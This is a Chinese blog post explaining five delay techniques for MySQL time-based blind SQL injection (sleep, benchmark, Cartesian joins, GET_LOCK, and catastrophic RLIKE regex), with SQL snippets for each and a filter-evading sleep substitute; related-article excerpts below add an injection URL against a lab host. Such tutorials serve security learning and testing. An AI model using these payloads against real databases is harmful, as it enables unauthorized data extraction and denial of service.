mysql 延时 注入_MySQL时间盲注五种延时方法

最新推荐文章于 2024-04-30 00:46:24 发布
最新推荐文章于 2024-04-30 00:46:24 发布
阅读量1.6k 收藏 1
点赞数
文章标签: mysql 延时 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39561168/article/details/113190560
版权

延时注入函数

五种:sleep(),benchmark(t,exp),笛卡尔积,GET_LOCK() RLIKE正则

sleep()

sleep(x)

select sleep(5);

benchmark() 重复执行某表达式

benchmark(t,exp)

select benchmark(count,expr),是重复执行count次expr表达式,使得处理时间很长,来产生延迟,

比如select benchmark(1000000,encode("hello","good"));

select benchmark(5000000, md5( 'test' ));​

笛卡尔积

笛卡尔积(因为连接表是一个很耗时的操作)

AxB=A和B中每个元素的组合所组成的集合,就是连接表

SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;

select* fromtable_name A, table_name B

select* fromtable_name A, table_name B,table_name C

select count(*) from table_name A, table_name B,table_name C 表可以是同一张表

GET_LOCK() 加锁

GET_LOCK(key,timeout)  需要两个连接会话

RELEASE_LOCK(key)  锁是否释放,释放了返回1

IS_FREE_LOCK(key)  返回当前连接ID,表示名称为'xxxx'的锁正在被使用。

key 锁的名字,timeout加锁等待时间,时间内未加锁成功则事件回滚。get_lock 加锁成功返回1,

这个锁是应用程序级别的,在不同的mysql会话之间使用,是名字锁,不是锁具体某个表名或字段,具体是锁什么完全交给应用程序。它是一种独占锁,意味着哪个会话持有这个锁,其他会话尝试拿这个锁的时候都会失败。

session A select get_lock('test',1);

session B select get_lock('test',5);

可以指定表也可以不指定

直到关闭连接会话结束,锁才会释放,但不像redis那样加了锁只要不主动释放就一直有。

但是当会话1 get_lock 后,未释放。会话2 不get_lock

同一个key,或者就不get_lock,依然可以对数据进行任何操作,所以加锁只是说人为的主观的想要让某些操作同时只有一个连接能进行操作,别的连接不调用get_lock加同一个锁,那它不会受到任何影响,想干什么干什么。

session1

6452ab6b5ab970290db92f0d5cd97eb2.png

session2

ed5e96ed67a9716c508f71d255520452.png

get_lock:但是当会话1

get_lock 后,未释放。会话2 不get_lock

同一个key,或者就不get_lock,依然可以对数据进行任何操作,所以加锁只是说人为的主观的想要让某些操作同时只有一个连接能进行操作,别的连接不调用get_lock加同一个锁,那它不会受到任何影响,想干什么干什么。

session1

78d7e4155391a831858cefc79fd3b1fc.png

session2

72d880b5716652eea8db119426059e56.png

优缺点分析(1)这种方式对于更新所有列比较有效,但是得把查询的语句也放在锁内执行; (2)这种方式当客户端无故断线了会自动释放锁,比较好,不像redis锁那样,如果加完锁断了,那么锁一直在; (3)这种方式是针对锁内的所有操作加锁,并不针对特定表或特定行,所以使用了同一个Key的锁但不同的操作都会共用一把锁,会导致效率低下; (4)如果查询语句放在锁之前,则数据可能是旧的,更新之后会把查询之后更新之前别的客户端更新的数据覆盖掉;

RLIKE REGEXP正则匹配

通过rpad或repeat构造长字符串,加以计算量大的pattern,通过repeat的参数可以控制延时长短。

select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');

正则语法:

. : 匹配任意单个字符*: 匹配0个或多个前一个得到的字符

[] : 匹配任意一个[]内的字符,[ab]*可匹配空串、a、b、或者由任意个a和b组成的字符串。^ : 匹配开头,如^s匹配以s或者S开头的字符串。

$ : 匹配结尾,如s$匹配以s结尾的字符串。

{n} : 匹配前一个字符反复n次。

RPAD(str,len,padstr)

用字符串 padstr对 str进行右边填补直至它的长度达到 len个字符长度,然后返回 str。如果 str的长度长于 len',那么它将被截除到 len个字符。

mysql> SELECT RPAD('hi',5,'?'); -> 'hi???'​

repeat(str,times) 复制字符串times次

⭐️寻找新的延迟函数

concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'

以上代码等同于 sleep(5)

weixin_39561168
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql延迟注入br_(原创)安全狗SQL注入绕过思路[sql注入waf绕过][sql注入bypass]
weixin_39743357的博客
01-28 251
2017/09/03_Bypass_safedog_Sql注入prat 1本文大致内容+ 思路以及想法- 四重注释绕过safedog+ 实战绕过- 绕过and 1=1- 绕过union+select- 爆表- 爆字段- 读内容prat 2测试代码$link = mysqli_connect('localhost','root','root','security');$sql = "select *...
Mysql注入 -- 延时注入
weixin_41489908的博客
05-16 2786
生活不止眼前的苟且,还有房费、饭费、水电费。。。 ----网易云热评 一、常用函数 1、sleep(5):延时5秒 2、if(a,b,c):a为条件,正确返回b,否则返回c 二、实例测试 1、找到可以注入的payload,服务器反映5秒才有相应 http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+ 2、获取数据库长度,如果数据库名的长度等于8停留5秒 http://192.168.139.129/sqli/..
超硬核,SQL注入时间盲注,原理+步骤+实战思路
最新发布
2401_84296945的博客
04-30 609
提示:sleep的时间可以自定义,时间太长效率太低、时间太短则不容易判断。
MySQL延时盲注
一个普普通通的博客
03-01 1428
Mysql延时盲注
mysql delayed 延迟插入
刘阳龙Herman的专栏
09-27 9487
DELAYED 的使用 使用延迟插入操作 DELAYED调节符应用于INSERT和REPLACE语句。当DELAYED插入操作到达的时候, 服务器把数据行放入一个队列中,并立即给客户端返回一个状态信息,这样客户 端就可以在数据表被真正地插入记录之前继续进行操作了。如果读取者从该数据 表中读取数据,队列中的数据就会被保持着,直到没有读取者为止。接着服务器 开始插入延迟数据行(delayed-row)队列中的数据行。在插入操作的同时,服务器 还要检查是否有新的读取请求到达和等待。如果有,延迟数据行队列就被挂起,
sql注入——mysql延时注入
Night_time的博客
05-06 3795
注入思路 1,判断是否存在注入点,注入点是字符型还是数值型 2,构建sleep延时注入语句,猜测当前数据库的库名的长度是几个字符 3,猜测数据库下的表名的长度是由多少个字符组成的 4,猜测字段名(列名) 5,猜测数据 使用延时注入的时机 用于,无法回现和无法显示错误页面的场景 使用if(length(注入语句)=N,sleep(5),1),改变N的值,如果条件成立,通过服务器的休...
mysql数据库备份设置延时备份方法(mysql主从配置)
09-10
MySQL数据库的延时备份是一种策略,它允许在主服务器数据更改后的一段时间内才在从服务器上执行这些更改,以防止因即时同步而导致的主服务器过载。这种备份方式特别适用于需要保护数据免受意外删除或错误操作影响的...
MySQL延时复制库方法详解
09-08
我相信很多人都遭遇过MySQL主从复制延迟的问题,处理方案基本上就是你能搜索到的那些,那么我今天却要说说如何让MySQL延迟复制。对于刚组建的团队来说,这可能会救了你的项目
MySQL数据库主从复制延时超长的解决方法
09-09
MySQL数据库主从复制是数据库高可用性和数据冗余的重要手段,但主从复制延时问题可能导致数据一致性受损,影响业务的正常运行。本篇文章将详细探讨这个问题及其解决方案。 首先,延时问题在MySQL主从复制中是普遍...
MySQL主从同步机制与同步延时问题追查过程
09-09
主要给大家介绍了关于MySQL主从同步机制与同步延时问题追查的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
mysql延迟注入是什么_mysql 延时注入新思路
weixin_42292183的博客
01-19 298
转自先知社区https://xz.aliyun.com/t/2288在4月的pwnhub比赛中,我们遇到了一个比较神奇的问题,如果在注入中遇到需要延时注入的情况,但服务端过滤了我们一般使用的sleep和benchmark函数,这时候我们有没有办法使用别的方式来替代这两个函数造成延时呢?这里可以代码看看require 'conn.php';$id = $_GET['id'];if(preg_matc...
MySQL延时注入(3分钟搞懂盲注思路)
yuan_boss的博客
08-23 1412
任务:sqli_labs第9关,通过延时注入,获取版本号。
【sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 6686
延时注入】结合if、case when 延时注入
mysql 延时注入,利用二进制延迟注入~!
weixin_33701617的博客
08-31 426
看了freebuf的延迟注入课程,感觉他那个突破延迟注入时间限制的思路非常不错 视频地址:然后自己写了个py的demo,代码写的渣勿笑~#!/usr/bin/envpython #-*-coding:utf-8-*- #@Author:Lcy #@Date:2015-08-2922:26:17 #@LastModifiedby:Sunsh...
MySQL延迟插入
weixin_34294649的博客
08-11 1379
2019独角兽企业重金招聘Python工程师标准>>> ...
sql注入时间注入
m0_63436163的博客
04-15 589
如果想要获取数据内容,可以用截取字符再进行字符对比,如果相同就进行延时。这样就能获取字符,接着再拼接就是当前库的内容。在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。在页面中分析源码,直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。--technique=T 检测方法时间注入。-u 表示检测的 url。-p 指定的检测参数。
mysql延迟注入原理_报错注入延时注入
weixin_42300721的博客
01-21 392
摘要:本篇填坑,补上关于报错注入延时注入报错注入需要了解的“函数”:rand():产生0到1之间的随机数floor():向下取整,即舍掉小数部分concat():拼接数据,将括号中的字符(串)进行拼接group by子句:与SELECT语句结合一起使用,将相同的数据分成一组count():查询记录数(对行数求和)用法演示1.select的作用image2.concat的作用(0x3a是十六进制的...
基于时间盲注
Z_l123的博客
02-18 1233
关于时间延时盲注 某些场合下,页面只有一种返回结果,使用具有延时功能的函数sleep()、benchmark()等,通过判断这些函数是否正常执行来获取数据库中的数据。 一些功能函数的说明 length(str):返回字符串(str)的长度,以字节为单位。 substr(str,pos,len):从指定的位置(pos)开始,截取并返回字符串(str)指定长度(len)的子串。 ascii(str):返回字符串(str)最左边字符的ASCll码。 if(expr1,expr2,expr3):条件判断函
基于时间盲注
weixin_41489908的博客
09-29 543
遗憾的是,两个人不能在一起,却偏偏相遇。。。 ---- 网易云热评 一、函数介绍 1、sleep(5):暂停5秒再返回结果 2、if(条件,表达式1,表达式2):如果条件为真,返回表达式1,否则返回表达式2 3、substr('admin',2,3):从第二个位置开始截取长度为3的字符串,即dmi 4、substring('admin',2,3):效果和上面一样 5、substring('admin' from 2 for 1):截取一个字母,省略了逗号 6、substring('admi.
mysql 存储过程 延时_mysql怎么让一个存储过程定时执行(转载)
06-02
要让 MySQL 存储过程定时执行,可以考虑使用 MySQL 的事件调度器。下面是一个简单的例子: 1.首先,需要确保事件调度器已经启用。在 MySQL 中,事件调度器默认是禁用的,可以通过修改 MySQL 配置文件(my.cnf)来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值